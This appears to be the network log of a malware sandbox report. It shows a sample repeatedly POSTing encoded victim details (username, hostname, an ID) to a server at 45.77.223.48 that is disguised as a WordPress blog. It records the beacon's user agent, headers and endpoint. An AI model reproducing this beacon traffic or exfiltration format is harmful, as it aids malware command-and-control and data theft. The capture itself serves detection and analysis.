                                            Apr 26, 2024 04:43:30.282660961 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:30.282753944 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:30.282916069 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:30.283008099 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:30.283272982 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            58192.168.2.44980145.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:30.595489979 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:30.785079956 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:32.741786957 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:30 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:32.742036104 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:32.753637075 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:32.754947901 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:32.756313086 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:32.756505966 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:32.756653070 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:32.756787062 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:32.756827116 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:32.756917000 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            59192.168.2.44980245.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:34.068335056 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:34.376399994 CEST395OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:35.261538982 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:34 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:35.261635065 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:35.262007952 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:35.269120932 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:35.269467115 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:35.269510031 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:35.269736052 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:35.271595955 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:35.271699905 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:35.271783113 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:35.450830936 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            60192.168.2.44980345.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:35.596260071 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:35.785276890 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:37.022051096 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:35 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:37.022212029 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:37.022315979 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:37.063513041 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:37.074321985 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:37.074476004 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:37.074548006 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:37.074830055 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:37.074889898 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:37.075083971 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            61192.168.2.44980445.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:38.519329071 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:38.709527969 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:39.619461060 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:38 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:39.619553089 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:39.619653940 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:39.630503893 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:39.630889893 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:39.631001949 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:39.631165981 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:39.631247997 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:39.631432056 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
